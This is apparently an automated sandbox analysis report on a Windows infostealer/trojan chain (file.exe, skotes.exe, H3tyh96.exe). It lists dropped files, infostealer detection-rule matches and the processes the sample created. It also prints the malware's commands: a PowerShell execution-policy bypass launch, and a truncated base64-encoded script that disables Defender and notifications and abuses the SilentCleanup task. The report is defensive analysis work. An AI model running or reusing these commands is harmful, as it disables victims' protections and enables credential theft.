Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0912A307	7_2_0912A307
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091218D0	7_2_091218D0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09123AB0	7_2_09123AB0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09123AA0	7_2_09123AA0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0912003E	7_2_0912003E
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0912B23E	7_2_0912B23E
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091A8B30	7_2_091A8B30
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091A8B20	7_2_091A8B20
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091BAAC0	7_2_091BAAC0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091BE128	7_2_091BE128
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091B79D0	7_2_091B79D0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091B99F0	7_2_091B99F0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091B79E0	7_2_091B79E0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091BAAB0	7_2_091BAAB0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091BB198	7_2_091BB198
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091BB1A8	7_2_091BB1A8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09201C77	7_2_09201C77
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09205689	7_2_09205689
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09208568	7_2_09208568
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09208578	7_2_09208578
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09209540	7_2_09209540
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09209550	7_2_09209550
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_092029C0	7_2_092029C0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09208B40	7_2_09208B40
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0920CA78	7_2_0920CA78
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0920CA88	7_2_0920CA88
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924C328	7_2_0924C328
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924A37F	7_2_0924A37F
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924D38D	7_2_0924D38D
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924A390	7_2_0924A390
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924D398	7_2_0924D398
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09247460	7_2_09247460
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924ECC0	7_2_0924ECC0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0924ECD0	7_2_0924ECD0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093738B0	7_2_093738B0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0937E8F8	7_2_0937E8F8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09377F78	7_2_09377F78
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0937C7A8	7_2_0937C7A8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09371148	7_2_09371148
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093718D8	7_2_093718D8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0937B3D8	7_2_0937B3D8
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0937DDE0	7_2_0937DDE0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093C3B10	7_2_093C3B10
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093C13B0	7_2_093C13B0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093C4280	7_2_093C4280
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093C2E78	7_2_093C2E78
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093C4F90	7_2_093C4F90
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093F5B18	7_2_093F5B18
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093F7558	7_2_093F7558
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093FD778	7_2_093FD778
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093F40E0	7_2_093F40E0
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_093FE668	7_2_093FE668

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe 03704AC5905C8ED32D791115AC52F119286075A5D25E3BE6724F3B990C3F6361

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003980C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0029DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 002B8E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0029D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0029D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0029D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00297A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 002980C0 appears 393 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1008

Source: random[2].exe.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: f2da6a22b2.exe.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Commandline size = 13369	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Commandline size = 13369	Jump to behavior

Source: 22.0.ClientAny.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 7.2.H3tyh96.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 7.2.H3tyh96.exe.8ec0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.H3tyh96.exe.8ec0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.H3tyh96.exe.8ec0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.H3tyh96.exe.8ec0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: H3tyh96[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9943704044117647
Source: H3tyh96[1].exe.6.dr	Static PE information: Section: kzyimikk ZLIB complexity 0.9950686517589821
Source: H3tyh96.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9943704044117647
Source: H3tyh96.exe.6.dr	Static PE information: Section: kzyimikk ZLIB complexity 0.9950686517589821
Source: random[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: random[1].exe.6.dr	Static PE information: Section: zroyxpcd ZLIB complexity 0.9947303827933985
Source: 75f24a4b40.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: 75f24a4b40.exe.6.dr	Static PE information: Section: zroyxpcd ZLIB complexity 0.9947303827933985
Source: random[1].exe0.6.dr	Static PE information: Section: razuzqfw ZLIB complexity 0.9946894369834711
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: Section: razuzqfw ZLIB complexity 0.9946894369834711

Source: H3tyh96[1].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: H3tyh96.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 7.2.H3tyh96.exe.8bb0000.7.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformBlock'
Source: 7.2.H3tyh96.exe.8bb0000.7.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.H3tyh96.exe.8bb0000.7.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 7.2.H3tyh96.exe.60a5838.6.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformBlock'
Source: 7.2.H3tyh96.exe.60a5838.6.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.H3tyh96.exe.60a5838.6.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: 7.2.H3tyh96.exe.9000000.9.raw.unpack, HandleDisableUAC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.H3tyh96.exe.9000000.9.raw.unpack, HandleDisableUAC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.H3tyh96.exe.9000000.9.raw.unpack, HandleDisableDefender.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.H3tyh96.exe.9000000.9.raw.unpack, HandleDisableDefender.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.H3tyh96.exe.9050000.12.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.H3tyh96.exe.9050000.12.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ClientAny.exe.7.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ClientAny.exe.7.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.H3tyh96.exe.9360000.15.raw.unpack, HandleDisableUAC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.H3tyh96.exe.9360000.15.raw.unpack, HandleDisableUAC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.H3tyh96.exe.9360000.15.raw.unpack, HandleDisableDefender.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.H3tyh96.exe.9360000.15.raw.unpack, HandleDisableDefender.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@103/144@86/10

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H3tyh96[1].exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Mutant created: \Sessions\1\BaseNamedObjects\clgbfqzkkypxjps
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7160
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: H3tyh96.exe, 00000007.00000003.3128604954.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3704413677.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3056350605.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3194930829.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3000099134.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2992038147.0000000005BBB000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2983574965.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3169297800.0000000005416000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3170600384.00000000053F9000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3214447983.0000000005492000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3213612613.00000000053FB000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: H3tyh96.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: H3tyh96.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeQ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe "C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe "C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe"
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1008
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
